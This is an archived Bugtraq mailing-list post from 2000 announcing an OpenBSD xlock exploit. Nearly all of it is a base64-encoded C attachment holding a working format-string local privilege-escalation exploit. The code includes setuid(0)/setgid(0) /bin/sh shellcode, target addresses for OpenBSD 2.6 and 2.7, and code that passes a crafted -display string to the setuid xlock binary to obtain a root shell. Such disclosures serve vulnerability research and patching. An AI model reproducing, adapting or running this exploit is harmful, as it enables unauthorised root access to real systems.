[17060] in bugtraq
OpenBSD xlock exploit
daemon@ATHENA.MIT.EDU (Noir Desir)
Thu Oct 5 12:26:11 2000
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="465751232-1087519910-970744218=:3819"
Message-ID: <Pine.LNX.4.20.0010051405490.3819-200000@gsu.linux.org.tr>
Date: Thu, 5 Oct 2000 14:10:18 +0300
Reply-To: Noir Desir <noir@GSU.LINUX.ORG.TR>
From: Noir Desir <noir@GSU.LINUX.ORG.TR>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--465751232-1087519910-970744218=:3819
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi,
exploit only tested on OpenBSD 2.6 i386,
thanks to caddis for the tips in his chpass exploit
greetz:
gsu-linux staff, dustdvl, CronoS, bind, caddis, calaz
ADM, TESO, SSG, Lam3rz
--465751232-1087519910-970744218=:3819
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="xlockx.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.20.0010051410180.3819@gsu.linux.org.tr>
Content-Description:
Content-Disposition: attachment; filename="xlockx.c"
LyoNCk9wZW5CU0QgMi42LzIuNyB4bG9jayBleHBsb2l0IGJ5IG5vaXINCm5v
aXJAZ3N1LmxpbnV4Lm9yZy50ciANCiANCnRlc3RlZCBvbmx5IG9uIE9wZW5C
U0QvaTM4NiAyLjYNCiANCnRoYW5rczoNCmNlbmdpel90dXJrbWVuQGhvdG1h
aWwuY29tIGZvciBzdXBwb3J0IQ0KDQpncmVldHM6IGNhZGRpcyA8Y2FkZGlz
QGRpc3NlbnNpb24ubmV0PiBvcmdpbmFsIGNocGFzcyBleHBsb2l0DQogCWJp
bmQsIENyb25vUywgZHVzdGR2bCwgcHBsIGZyb20gZGVmY29uNywgZ3N1LWxp
bnV4IHN0YWZmDQoJVEVTTywgQURNLCBMYW0zcnosIFNTRyANCiovDQoNCg0K
I2luY2x1ZGUgPHN0ZGlvLmg+DQoNCg0KDQpjaGFyIGJzZF9zaGVsbGNvZGVb
XSA9DQoiXHgzMVx4YzBceDUwXHg1MFx4YjBceDE3XHhjZFx4ODAiLy8gc2V0
dWlkKDApIA0KIlx4MzFceGMwXHg1MFx4NTBceGIwXHhiNVx4Y2RceDgwIi8v
c2V0Z2lkKDApDQoiXHhlYlx4MTZceDVlXHgzMVx4YzBceDhkXHgwZVx4ODki
DQoiXHg0ZVx4MDhceDg5XHg0Nlx4MGNceDhkXHg0ZVx4MDgiDQoiXHg1MFx4
NTFceDU2XHg1MFx4YjBceDNiXHhjZFx4ODAiDQoiXHhlOFx4ZTVceGZmXHhm
Zlx4ZmYvYmluL3NoIjsNCg0Kc3RydWN0IHBsYXRmb3JtIHsNCiAgICBjaGFy
ICpuYW1lOw0KICAgIHVuc2lnbmVkIHNob3J0IGNvdW50Ow0KICAgIHVuc2ln
bmVkIGxvbmcgZGVzdF9hZGRyOw0KICAgIHVuc2lnbmVkIGxvbmcgc2hlbGxf
YWRkcjsNCiAgICBjaGFyICpzaGVsbGNvZGU7DQp9Ow0KDQpzdHJ1Y3QgcGxh
dGZvcm0gdGFyZ2V0c1szXSA9DQp7DQogICAgeyAiT3BlbkJTRCAyLjYgaTM4
NiAgICAgICAiLCAyNDYsIDB4ZGZiZmQ0YTAsIDB4ZGZiZmRkZTAsIGJzZF9z
aGVsbGNvZGUgfSwNCiAgICB7ICJPcGVuQlNEIDIuNyBpMzg2ICAgICAgICIs
IDI0NiwgMHhhYWJiY2NkZCwgMHhhYWJiY2NkZCwgYnNkX3NoZWxsY29kZSB9
LA0KICAgIHsgTlVMTCwgMCwgMCwgMCwgTlVMTCB9DQp9Ow0KDQpjaGFyIGpt
cGNvZGVbMTI5XTsNCmNoYXIgZm10X3N0cmluZ1syMDAwXTsNCg0KY2hhciAq
YXJnc1tdID0geyAieGxvY2siLCAiLWRpc3BsYXkiLCBmbXRfc3RyaW5nLCBO
VUxMIH07DQpjaGFyICplbnZzW10gPSB7IGptcGNvZGUsIE5VTEwgfTsNCg0K
DQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KICAgIGNo
YXIgKnA7DQogICAgaW50IHgsIGxlbiA9IDA7DQogICAgc3RydWN0IHBsYXRm
b3JtICp0YXJnZXQ7DQogICAgdW5zaWduZWQgc2hvcnQgbG93LCBoaWdoOw0K
ICAgIHVuc2lnbmVkIGxvbmcgc2hlbGxfYWRkclsyXSwgZGVzdF9hZGRyWzJd
Ow0KDQoNCiAgICB0YXJnZXQgPSAmdGFyZ2V0c1swXTsNCg0KICAgIG1lbXNl
dChqbXBjb2RlLCAweDkwLCBzaXplb2Yoam1wY29kZSkpOw0KICAgIHN0cmNw
eShqbXBjb2RlICsgc2l6ZW9mKGptcGNvZGUpIC0gc3RybGVuKHRhcmdldC0+
c2hlbGxjb2RlKSwgdGFyZ2V0LT5zaGVsbGNvZGUpOw0KDQogICAgc2hlbGxf
YWRkclswXSA9ICh0YXJnZXQtPnNoZWxsX2FkZHIgJiAweGZmZmYwMDAwKSA+
PiAxNjsNCiAgICBzaGVsbF9hZGRyWzFdID0gIHRhcmdldC0+c2hlbGxfYWRk
ciAmIDB4ZmZmZjsNCg0KbWVtc2V0KGZtdF9zdHJpbmcsIDB4MDAsIHNpemVv
ZihmbXRfc3RyaW5nKSk7DQogDQpmb3IgKHggPSAxNzsgeCA8IHRhcmdldC0+
Y291bnQ7IHgrKykgew0KICAgICAgICBzdHJjYXQoZm10X3N0cmluZywgIiU4
eCIpOw0KICAgICAgICBsZW4gKz0gODsNCiAgICB9DQoNCmlmIChzaGVsbF9h
ZGRyWzFdID4gc2hlbGxfYWRkclswXSkgew0KICAgICAgICBkZXN0X2FkZHJb
MF0gPSB0YXJnZXQtPmRlc3RfYWRkcisyOw0KICAgICAgICBkZXN0X2FkZHJb
MV0gPSB0YXJnZXQtPmRlc3RfYWRkcjsNCiAgICAgICAgbG93ICA9IHNoZWxs
X2FkZHJbMF0gLSBsZW47DQogICAgICAgIGhpZ2ggPSBzaGVsbF9hZGRyWzFd
IC0gbG93IC0gbGVuOw0KICAgIH0gZWxzZSB7DQogICAgICAgIGRlc3RfYWRk
clswXSA9IHRhcmdldC0+ZGVzdF9hZGRyOw0KICAgICAgICBkZXN0X2FkZHJb
MV0gPSB0YXJnZXQtPmRlc3RfYWRkcisyOw0KICAgICAgICBsb3cgID0gc2hl
bGxfYWRkclsxXSAtIGxlbjsNCiAgICAgICAgaGlnaCA9IHNoZWxsX2FkZHJb
MF0gLSBsb3cgLSBsZW47DQogICAgfQ0KDQogICAgKihsb25nICopJmZtdF9z
dHJpbmdbMF0gPSAgMHg0MTsNCiAgICAqKGxvbmcgKikmZm10X3N0cmluZ1sx
XSAgPSAweDExMTExMTExOw0KICAgICoobG9uZyAqKSZmbXRfc3RyaW5nWzVd
ICA9IGRlc3RfYWRkclswXTsNCiAgICAqKGxvbmcgKikmZm10X3N0cmluZ1s5
XSAgPSAweDExMTExMTExOw0KICAgICoobG9uZyAqKSZmbXRfc3RyaW5nWzEz
XSA9IGRlc3RfYWRkclsxXTsNCg0KDQogICAgcCA9IGZtdF9zdHJpbmcgKyBz
dHJsZW4oZm10X3N0cmluZyk7DQogICAgc3ByaW50ZihwLCAiJSUlZGQlJWhu
JSUlZGQlJWhuIiwgbG93LCBoaWdoKTsNCg0KICAgIGV4ZWN2ZSgiL3Vzci9Y
MTFSNi9iaW4veGxvY2siLCBhcmdzLCBlbnZzKTsNCiAgICBwZXJyb3IoImV4
ZWN2ZSIpOw0KfQ0KDQoNCg0K
--465751232-1087519910-970744218=:3819--
